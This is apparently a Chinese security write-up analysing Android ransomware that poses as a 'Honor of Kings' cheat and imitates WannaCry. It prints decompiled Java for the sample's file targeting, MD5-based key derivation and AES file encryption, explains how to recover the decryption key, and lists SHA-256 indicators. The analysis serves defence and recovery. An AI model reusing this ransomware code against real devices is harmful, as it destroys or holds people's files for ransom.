

伪装成 “王者荣耀辅助”的名字和图标,模仿WannaCry的界面







ransomware 安装之后,它会检查它之前有没有被安装果。如果没有,它就会生成一个随机数,然后把它存储在SharedPreferences(一个.xml文件)中,这个文件可以用来存储app的持久型数据。然后它就会找到设备的外部存储设备,然后开一个新线程。
1. 文件完整路径的小写不能包含“/.”, “android”, “com.” and “miad”
2. 以external storage为root路径,查找其三层目录,从中找出包含“baidunetdisk”, “download” 或者“dcim”的目录。
3. 文件名必须包含“.”(即文件名必须有后缀) ,而且加密后的文件名的大小必须小于251个字节。
4. 文件本身大小必须在10 KB和50MB之间

可以看出ransomware 不加密系统文件,而主要着眼于默认下载目录的文件和图片,而且只会加密有后缀名的文件(文本,图片,视频)。
当找到满足这些条件的 文件的时候,这个线程就会使用ExecutorService(Java中用来执行异步task的API)来执行一个新的task。


ExecutorService executorService;
if (i2 == 0) {try {if (file3.isFile() && r10.equals(MainActivity.hz) && file3.toString().indexOf("/.") == -1 && file3.getName().indexOf(".") != -1) {executorService = executorService;AnonymousClass100000001 anonymousClass100000001 = r20;AnonymousClass100000001 anonymousClass1000000012 = new AnonymousClass100000001(file3, str2, i2, context2);executorService.execute(anonymousClass100000001);} else if (file3.isDirectory() && file3.toString().indexOf("/.") == -1 && file3.toString().toLowerCase().indexOf("android") == -1 && file3.toString().toLowerCase().indexOf("com.") == -1 && file3.toString().toLowerCase().indexOf("miad") == -1 && !(jd(file3.toString()) >= 3 && file3.toString().toLowerCase().indexOf("baidunetdisk") == -1 && file3.toString().toLowerCase().indexOf("download") == -1 && file3.toString().toLowerCase().indexOf("dcim") == -1)) {deleteDirWihtFile(file3, str2, i2, context2);}} catch (Exception e) {Exception exception = e;}} else {if (file3.isFile() && !r10.equals(MainActivity.hz) && file3.toString().indexOf("/.") == -1 && file3.getName().indexOf(".") != -1 && file3.length() > ((long) 10240) && file3.length() <= ((long) 52428800)) {StringBuffer stringBuffer = r20;StringBuffer stringBuffer2 = new StringBuffer();if (zjs(stringBuffer.append(file3.getName()).append(MainActivity.hz).toString()) <= 251) {bb = 1 + bb;executorService = executorService;AnonymousClass100000002 anonymousClass100000002 = r20;AnonymousClass100000002 anonymousClass1000000022 = new AnonymousClass100000002(file3, str2, i2, context2);executorService.execute(anonymousClass100000002);}}if (file3.isDirectory() && file3.toString().indexOf("/.") == -1 && file3.toString().toLowerCase().indexOf("android") == -1 && file3.toString().toLowerCase().indexOf("com.") == -1 && file3.toString().toLowerCase().indexOf("miad") == -1 && !(jd(file3.toString()) >= 3 && file3.toString().toLowerCase().indexOf("baidunetdisk") == -1 && file3.toString().toLowerCase().indexOf("download") == -1 && file3.toString().toLowerCase().indexOf("dcim") == -1)) {deleteDirWihtFile(file3, str2, i2, context2);}}

新的task会调用一个叫做getsss()的方法生成一个基于之前产生的随机数的cipher(秘钥)。这个方法计算这个随机数的md5值,然后然后从这个md5值的16进制表示中选择16个字符串。字符串生成后,ransomware 会将它传到SecretKeySpec用来构造最终用来对文件进行加密的AES key。

    public static final String getsss(String str) {char[] cArr = new char[]{'0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f'};try {byte[] bytes = str.getBytes();MessageDigest instance = MessageDigest.getInstance("MD5");instance.update(bytes);char[] cArr2 = new char[(r6 * 2)];int i = 0;for (byte b : instance.digest()) {int i2 = i;i++;cArr2[i2] = cArr[(b >>> 4) & 15];i2 = i;i++;cArr2[i2] = cArr[b & 15];}String str2 = r17;String str3 = new String(cArr2);return str2.toString().substring(8, 24);} catch (Exception e) {e.printStackTrace();return (String) null;}}

可能不同样本的 这个方法的内容不同?






public static java.io.File encryptFile(String str1, String pFileName, String str3) {v6 = new FileInputStream(pFileName);v7 = new FileOutputStream();v15 = new javax.crypto.CipherInputStream(v6, sss.initAESCipher(str1, 1));


    /* JADX WARNING: inconsistent code. *//* Code decompiled incorrectly, please refer to instructions dump. */public static java.io.File encryptFile(java.lang.String r25, java.lang.String r26, java.lang.String r27) {/* JADX: method processing error */
Error: java.lang.NullPointerExceptionat jadx.core.dex.visitors.regions.ProcessVariables.addToUsageMap(ProcessVariables.java:284)at jadx.core.dex.visitors.regions.ProcessVariables.access$000(ProcessVariables.java:36)at jadx.core.dex.visitors.regions.ProcessVariables$CollectUsageRegionVisitor.processInsn(ProcessVariables.java:169)at jadx.core.dex.visitors.regions.ProcessVariables$CollectUsageRegionVisitor.processBlockTraced(ProcessVariables.java:135)at jadx.core.dex.visitors.regions.TracedRegionVisitor.processBlock(TracedRegionVisitor.java:23)at jadx.core.dex.visitors.regions.DepthRegionTraversal.traverseInternal(DepthRegionTraversal.java:53)at jadx.core.dex.visitors.regions.DepthRegionTraversal.traverseInternal(DepthRegionTraversal.java:58)at jadx.core.dex.visitors.regions.DepthRegionTraversal.traverseInternal(DepthRegionTraversal.java:58)at jadx.core.dex.visitors.regions.DepthRegionTraversal.traverseInternal(DepthRegionTraversal.java:58)at jadx.core.dex.visitors.regions.DepthRegionTraversal.traverse(DepthRegionTraversal.java:18)at jadx.core.dex.visitors.regions.ProcessVariables.visit(ProcessVariables.java:187)at jadx.core.dex.visitors.DepthTraversal.visit(DepthTraversal.java:31)at jadx.core.dex.visitors.DepthTraversal.visit(DepthTraversal.java:17)at jadx.core.ProcessClass.process(ProcessClass.java:37)at jadx.core.ProcessClass.processDependencies(ProcessClass.java:59)at jadx.core.ProcessClass.process(ProcessClass.java:42)at jadx.api.JadxDecompiler.processClass(JadxDecompiler.java:306)at jadx.api.JavaClass.decompile(JavaClass.java:62)
*//*r2 = r25;r3 = r26;r4 = r27;r20 = 0;r20 = (java.io.FileInputStream) r20;r6 = r20;r20 = 0;r20 = (java.io.FileOutputStream) r20;r7 = r20;r20 = 0;r20 = (java.io.File) r20;r8 = r20;r20 = 0;r20 = (java.io.File) r20;r9 = r20;r20 = new java.io.File;  Catch:{ FileNotFoundException -> 0x00ec, IOException -> 0x00f5 }r24 = r20;   Catch:{ FileNotFoundException -> 0x00ec, IOException -> 0x00f5 }r20 = r24;   Catch:{ FileNotFoundException -> 0x00ec, IOException -> 0x00f5 }r21 = r24;   Catch:{ FileNotFoundException -> 0x00ec, IOException -> 0x00f5 }r22 = r3;    Catch:{ FileNotFoundException -> 0x00ec, IOException -> 0x00f5 }r21.<init>(r22);     Catch:{ FileNotFoundException -> 0x00ec, IOException -> 0x00f5 }r9 = r20;    Catch:{ FileNotFoundException -> 0x00ec, IOException -> 0x00f5 }r20 = new java.io.File;  Catch:{ FileNotFoundException -> 0x00ec, IOException -> 0x00f5 }r24 = r20;   Catch:{ FileNotFoundException -> 0x00ec, IOException -> 0x00f5 }r20 = r24;   Catch:{ FileNotFoundException -> 0x00ec, IOException -> 0x00f5 }r21 = r24;   Catch:{ FileNotFoundException -> 0x00ec, IOException -> 0x00f5 }r22 = r4;    Catch:{ FileNotFoundException -> 0x00ec, IOException -> 0x00f5 }r21.<init>(r22);     Catch:{ FileNotFoundException -> 0x00ec, IOException -> 0x00f5 }r8 = r20;    Catch:{ FileNotFoundException -> 0x00ec, IOException -> 0x00f5 }r20 = r9;    Catch:{ FileNotFoundException -> 0x00ec, IOException -> 0x00f5 }r20 = r20.exists();  Catch:{ FileNotFoundException -> 0x00ec, IOException -> 0x00f5 }if (r20 == 0) goto L_0x00cc;     Catch:{ FileNotFoundException -> 0x00ec, IOException -> 0x00f5 }L_0x0044:r20 = r9;    Catch:{ FileNotFoundException -> 0x00ec, IOException -> 0x00f5 }r20 = r20.isFile();  Catch:{ FileNotFoundException -> 0x00ec, IOException -> 0x00f5 }if (r20 == 0) goto L_0x00cc;     Catch:{ FileNotFoundException -> 0x00ec, IOException -> 0x00f5 }L_0x004c:r20 = r8;    Catch:{ FileNotFoundException -> 0x00ec, IOException -> 0x00f5 }r20 = r20.getParentFile();   Catch:{ FileNotFoundException -> 0x00ec, IOException -> 0x00f5 }r20 = r20.exists();  Catch:{ FileNotFoundException -> 0x00ec, IOException -> 0x00f5 }if (r20 != 0) goto L_0x0062;     Catch:{ FileNotFoundException -> 0x00ec, IOException -> 0x00f5 }L_0x0058:r20 = r8;    Catch:{ FileNotFoundException -> 0x00ec, IOException -> 0x00f5 }r20 = r20.getParentFile();   Catch:{ FileNotFoundException -> 0x00ec, IOException -> 0x00f5 }r20 = r20.mkdirs();  Catch:{ FileNotFoundException -> 0x00ec, IOException -> 0x00f5 }L_0x0062:r20 = r8;    Catch:{ FileNotFoundException -> 0x00ec, IOException -> 0x00f5 }r20 = r20.createNewFile();   Catch:{ FileNotFoundException -> 0x00ec, IOException -> 0x00f5 }r20 = new java.io.FileInputStream;   Catch:{ FileNotFoundException -> 0x00ec, IOException -> 0x00f5 }r24 = r20;   Catch:{ FileNotFoundException -> 0x00ec, IOException -> 0x00f5 }r20 = r24;   Catch:{ FileNotFoundException -> 0x00ec, IOException -> 0x00f5 }r21 = r24;   Catch:{ FileNotFoundException -> 0x00ec, IOException -> 0x00f5 }r22 = r9;    Catch:{ FileNotFoundException -> 0x00ec, IOException -> 0x00f5 }r21.<init>(r22);     Catch:{ FileNotFoundException -> 0x00ec, IOException -> 0x00f5 }r6 = r20;    Catch:{ FileNotFoundException -> 0x00ec, IOException -> 0x00f5 }r20 = new java.io.FileOutputStream;  Catch:{ FileNotFoundException -> 0x00ec, IOException -> 0x00f5 }r24 = r20;   Catch:{ FileNotFoundException -> 0x00ec, IOException -> 0x00f5 }r20 = r24;   Catch:{ FileNotFoundException -> 0x00ec, IOException -> 0x00f5 }r21 = r24;   Catch:{ FileNotFoundException -> 0x00ec, IOException -> 0x00f5 }r22 = r8;    Catch:{ FileNotFoundException -> 0x00ec, IOException -> 0x00f5 }r21.<init>(r22);     Catch:{ FileNotFoundException -> 0x00ec, IOException -> 0x00f5 }r7 = r20;    Catch:{ FileNotFoundException -> 0x00ec, IOException -> 0x00f5 }r20 = r2;    Catch:{ FileNotFoundException -> 0x00ec, IOException -> 0x00f5 }r21 = 1;     Catch:{ FileNotFoundException -> 0x00ec, IOException -> 0x00f5 }r20 = initAESCipher(r20, r21);   Catch:{ FileNotFoundException -> 0x00ec, IOException -> 0x00f5 }r14 = r20;   Catch:{ FileNotFoundException -> 0x00ec, IOException -> 0x00f5 }r20 = new javax.crypto.CipherInputStream;    Catch:{ FileNotFoundException -> 0x00ec, IOException -> 0x00f5 }r24 = r20;   Catch:{ FileNotFoundException -> 0x00ec, IOException -> 0x00f5 }r20 = r24;   Catch:{ FileNotFoundException -> 0x00ec, IOException -> 0x00f5 }r21 = r24;   Catch:{ FileNotFoundException -> 0x00ec, IOException -> 0x00f5 }r22 = r6;    Catch:{ FileNotFoundException -> 0x00ec, IOException -> 0x00f5 }r23 = r14;   Catch:{ FileNotFoundException -> 0x00ec, IOException -> 0x00f5 }r21.<init>(r22, r23);    Catch:{ FileNotFoundException -> 0x00ec, IOException -> 0x00f5 }r15 = r20;   Catch:{ FileNotFoundException -> 0x00ec, IOException -> 0x00f5 }r20 = 1024; // 0x400 float:1.435E-42 double:5.06E-321;   Catch:{ FileNotFoundException -> 0x00ec, IOException -> 0x00f5 }r0 = r20;    Catch:{ FileNotFoundException -> 0x00ec, IOException -> 0x00f5 }r0 = new byte[r0];   Catch:{ FileNotFoundException -> 0x00ec, IOException -> 0x00f5 }r20 = r0;    Catch:{ FileNotFoundException -> 0x00ec, IOException -> 0x00f5 }r16 = r20;   Catch:{ FileNotFoundException -> 0x00ec, IOException -> 0x00f5 }r20 = 0;     Catch:{ FileNotFoundException -> 0x00ec, IOException -> 0x00f5 }r17 = r20;   Catch:{ FileNotFoundException -> 0x00ec, IOException -> 0x00f5 }L_0x00af:r20 = r15;   Catch:{ FileNotFoundException -> 0x00ec, IOException -> 0x00f5 }r21 = r16;   Catch:{ FileNotFoundException -> 0x00ec, IOException -> 0x00f5 }r20 = r20.read(r21);     Catch:{ FileNotFoundException -> 0x00ec, IOException -> 0x00f5 }r24 = r20;   Catch:{ FileNotFoundException -> 0x00ec, IOException -> 0x00f5 }r20 = r24;   Catch:{ FileNotFoundException -> 0x00ec, IOException -> 0x00f5 }r21 = r24;   Catch:{ FileNotFoundException -> 0x00ec, IOException -> 0x00f5 }r17 = r21;   Catch:{ FileNotFoundException -> 0x00ec, IOException -> 0x00f5 }r21 = -1;    Catch:{ FileNotFoundException -> 0x00ec, IOException -> 0x00f5 }r0 = r20;    Catch:{ FileNotFoundException -> 0x00ec, IOException -> 0x00f5 }r1 = r21;    Catch:{ FileNotFoundException -> 0x00ec, IOException -> 0x00f5 }if (r0 != r1) goto L_0x00db;     Catch:{ FileNotFoundException -> 0x00ec, IOException -> 0x00f5 }L_0x00c7:r20 = r15;   Catch:{ FileNotFoundException -> 0x00ec, IOException -> 0x00f5 }r20.close();     Catch:{ FileNotFoundException -> 0x00ec, IOException -> 0x00f5 }L_0x00cc:r20 = r7;r20.close();     Catch:{ IOException -> 0x0120 }L_0x00d1:r20 = r6;r20.close();     Catch:{ IOException -> 0x0129 }L_0x00d6:r20 = r8;r2 = r20;return r2;L_0x00db:r20 = r7;r21 = r16;r22 = 0;r23 = r17;r20.write(r21, r22, r23);    Catch:{ FileNotFoundException -> 0x00ec, IOException -> 0x00f5 }r20 = r7;    Catch:{ FileNotFoundException -> 0x00ec, IOException -> 0x00f5 }r20.flush();     Catch:{ FileNotFoundException -> 0x00ec, IOException -> 0x00f5 }goto L_0x00af;L_0x00ec:r20 = move-exception;r14 = r20;r20 = r14;r20.printStackTrace();   Catch:{ all -> 0x00fe }goto L_0x00cc;   Catch:{ all -> 0x00fe }L_0x00f5:r20 = move-exception;    Catch:{ all -> 0x00fe }r14 = r20;   Catch:{ all -> 0x00fe }r20 = r14;   Catch:{ all -> 0x00fe }r20.printStackTrace();   Catch:{ all -> 0x00fe }goto L_0x00cc;L_0x00fe:r20 = move-exception;r10 = r20;r20 = r7;r20.close();     Catch:{ IOException -> 0x010e }L_0x0106:r20 = r6;r20.close();     Catch:{ IOException -> 0x0117 }L_0x010b:r20 = r10;throw r20;L_0x010e:r20 = move-exception;r18 = r20;r20 = r18;r20.printStackTrace();goto L_0x0106;L_0x0117:r20 = move-exception;r18 = r20;r20 = r18;r20.printStackTrace();goto L_0x010b;L_0x0120:r20 = move-exception;r18 = r20;r20 = r18;r20.printStackTrace();goto L_0x00d1;L_0x0129:r20 = move-exception;r18 = r20;r20 = r18;r20.printStackTrace();goto L_0x00d6;*/throw new UnsupportedOperationException("Method not decompiled: com.android.tencent.zdevs.bah.sss.encryptFile(java.lang.String, java.lang.String, java.lang.String):java.io.File");}





    private static Cipher initAESCipher(String str, int i) {String str2 = str;int i2 = i;Cipher cipher = (Cipher) null;try {IvParameterSpec ivParameterSpec = r11;IvParameterSpec ivParameterSpec2 = new IvParameterSpec("QQqun 571012706 ".getBytes());IvParameterSpec ivParameterSpec3 = ivParameterSpec;SecretKeySpec secretKeySpec = r11;SecretKeySpec secretKeySpec2 = new SecretKeySpec(str2.getBytes(), "AES");SecretKeySpec secretKeySpec3 = secretKeySpec;cipher = Cipher.getInstance("AES/CBC/PKCS5Padding");cipher.init(i2, secretKeySpec3, ivParameterSpec3);} catch (NoSuchAlgorithmException e) {e.printStackTrace();} catch (NoSuchPaddingException e2) {e2.printStackTrace();} catch (InvalidKeyException e3) {e3.printStackTrace();} catch (InvalidAlgorithmParameterException e4) {e4.printStackTrace();}return cipher;}



ransomware说如果收到ransom,则会下发一个解密的key。然而我们通过分析发现,当受害者点击Decrypt按钮时,ransomware会将输入的值与MainActivity.m的值进行比较。而通过track MainActivity.m,我们发现这个值其实就是之前提到的那个随机数 + 520



Indicators of Compromise (IOCS)

200d8f98c326fc65f3a11dc5ff1951051c12991cc0996273eeb9b71b27bc294d com.android.tencent.zdevs.bah 王者荣耀辅助
2ffd539d462847bebcdff658a83f74ca7f039946bbc6c6247be2fc62dc0e4060 com.android.tencent.zdevs.bah 千变语音
36f40d5a11d886a2280c57859cd5f22de2d78c87dcdb52ea601089745eeee494 com.android.tencent.zdevs.bah 王者荣耀前瞻版
c347e09b1489c5b8061828526f4ce778fda8ef7fb835255914eb3c9268a265bf com.android.tencent.zdevs.bah 千变语音秀
cb0a18bcc8a2c9a966d3f585771db8b2e627a7b4427a889191a93b3a1b261ba3 com.android.tencent.zdevs.bah 主流影视大全


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